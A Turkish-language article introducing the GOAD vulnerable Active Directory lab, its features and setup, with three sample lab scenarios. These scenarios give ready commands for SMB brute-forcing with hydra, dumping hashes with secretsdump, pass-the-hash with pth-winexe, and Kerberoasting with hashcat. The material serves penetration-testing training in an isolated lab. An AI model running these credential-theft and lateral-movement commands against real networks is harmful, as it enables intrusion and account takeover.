Active Directory Güvenliği ve GOAD: Siber Güvenlikte Pratik Bir Laboratuvar
Active Directory (AD), kurumsal ağların bel kemiğidir. Kimlik doğrulama, yetkilendirme ve kaynak yönetimi gibi kritik işlevleri üstlenen AD, siber saldırganların da başlıca hedefi haline gelmiştir. Peki, güvenlik uzmanları bu karmaşık sistemlere yönelik saldırıları nasıl öğrenebilir ve savunma stratejilerini nasıl geliştirebilir? İşte tam da bu noktada GOAD (Game of Active Directory), Orange Cyberdefense tarafından geliştirilen açık kaynaklı bir laboratuvar projesi, devreye giriyor.
GOAD Nedir?
GOAD, siber güvenlik uzmanlarına ve sızma testi meraklılarına gerçekçi bir Active Directory ortamı sunan, kullanıma hazır bir sanal laboratuvardır. Bu projenin temel amacı, kullanıcıların yaygın AD saldırı tekniklerini risksiz bir ortamda deneyimleyerek becerilerini geliştirmesini sağlamaktır.
GOAD’ın Temel Özellikleri
- Kullanıma Hazır Sanal Ortam: VMware, VirtualBox ve Vagrant desteğiyle çalışan GOAD, önceden yapılandırılmış sanal makineler (DC’ler, iş istasyonları) içerir.
- Gerçekçi Senaryolar: Ortamda kasıtlı olarak bırakılan zafiyetler, aşağıdaki gibi saldırıların simüle edilmesine olanak tanır:
- Kimlik Avı (Phishing) ve kimlik bilgisi hırsızlığı,
- Yatay/Dikey Hareket teknikleri,
- Golden Ticket ve Silver Ticket saldırıları,
- ACL (Erişim Kontrol Listesi) istismarları.
- Ücretsiz ve Erişilebilir: Açık kaynaklı olması, herkesin katkıda bulunmasına ve öğrenmesine olanak tanır.
GOAD ile Neler Öğrenebilirsiniz?
- Active Directory Temelleri: Domain Controller, Grup Politikaları (GPO), OU yapıları gibi AD bileşenlerini keşfedin.
- Saldırı Yüzeyi Analizi: Zayıf şifre politikaları, fazla yetkilendirilmiş kullanıcı hesapları gibi riskleri tanımlayın.
- Sızma Testi Araçları: Mimikatz, BloodHound, Impacket gibi araçları laboratuvarda güvenle kullanın.
- Savunma Stratejileri: Saldırıları tespit etme ve engelleme yöntemlerini test edin.
GOAD Kurulumu: 3 Adımda Laboratuvarınızı Ayağa Kaldırın
1. Ön Koşullar
- VMware, VirtualBox ve Vagrant kurulu olmalı.
- 8 GB+ RAM ve yeterli depolama alanına sahip bir makine.
2. Kodları İndirin
3. Sanal Makineleri Başlatın
Ansible playbook’ları otomatik olarak domain controller’ları, Windows/Linux makinelerini yapılandıracaktır.
GOAD ile Örnek Sızma Testi Senaryoları
1. İlk Erişim: Zayıf Şifreli Kullanıcı Hesabının Ele Geçirilmesi
Amaç: Bir kullanıcı hesabının zayıf şifresini kırarak başlangıç erişimi sağlamak.
Araçlar: nmap
, hydra
, crackmapexec
Adımlar:
- Ağdaki SMB portlarını (445) tarayın:
nmap -p 445 192.168.56.0/24
- Hydra ile brute-force saldırısı yapın (örnek kullanıcı:
user1
):hydra -l user1 -P /usr/share/wordlists/rockyou.txt smb://192.168.56.10
- Başarılı kimlik bilgileriyle oturum açın:
crackmapexec smb 192.168.56.10 -u user1 -p 'Password123!'
2. Lateral Movement: Pass-the-Hash ile Yatay Hareket
Amaç: Ele geçirilen NTLM hash’i kullanarak başka bir makineye sıçramak.
Araçlar: pth-winexe
, secretsdump.py
(Impacket)
Adımlar:
- Hash’i çıkarın (örnek hedef:
WS01
):secretsdump.py 'user1:Password123!@192.168.56.10'
- Elde edilen Administrator hash’i ile hedef makinede komut çalıştırın:
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:CCF3C6466D32D3B2A0413333F5C65809 //192.168.56.20 cmd
3. Privilege Escalation: Kerberoasting ile Yetki Yükseltme
Amaç: Service Principal Name (SPN) kayıtlı bir hesabın TGS biletini çalıp şifresini kırmak.
Araçlar: GetUserSPNs.py
(Impacket), hashcat
Adımlar:
- SPN kayıtlı hesapları listeleyin:
GetUserSPNs.py -dc-ip 192.168.56.10 LAB.LOCAL/user1:Password123! -request
- Çalınan hash’i
hashcat
ile kırın:hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
Neden GOAD Tercih Edilmeli?
- Zaman Tasarrufu: Laboratuvar kurulumu saatler süren bir işlemken, GOAD ile bu süre 10-15 dakikaya iner.
- Gerçekçi Senaryolar: Gerçek dünyadaki saldırı tekniklerini birebir simüle eder.
- Ücretsiz ve Erişilebilir: Açık kaynaklı olması, herkesin katkıda bulunmasına ve öğrenmesine olanak tanır.
GOAD, siber güvenlik uzmanları için bir “oyun alanı” sunarak teorik bilgiyi pratiğe dökme fırsatı veriyor. Saldırı tekniklerini öğrenmek, savunma stratejilerini test etmek veya sertifikasyon sınavlarına hazırlanmak isteyenler için vazgeçilmez bir kaynak. Projeyi incelemek, katkıda bulunmak veya deneyimlerinizi paylaşmak için GOAD GitHub Repo’yu ziyaret edebilirsiniz.
Unutmayın: “En iyi savunma, iyi bir saldırıyı anlamaktır!”
#Siber Güvenlik #ActiveDirectory #SızmaTesti #GOAD #OrangeCyberdefense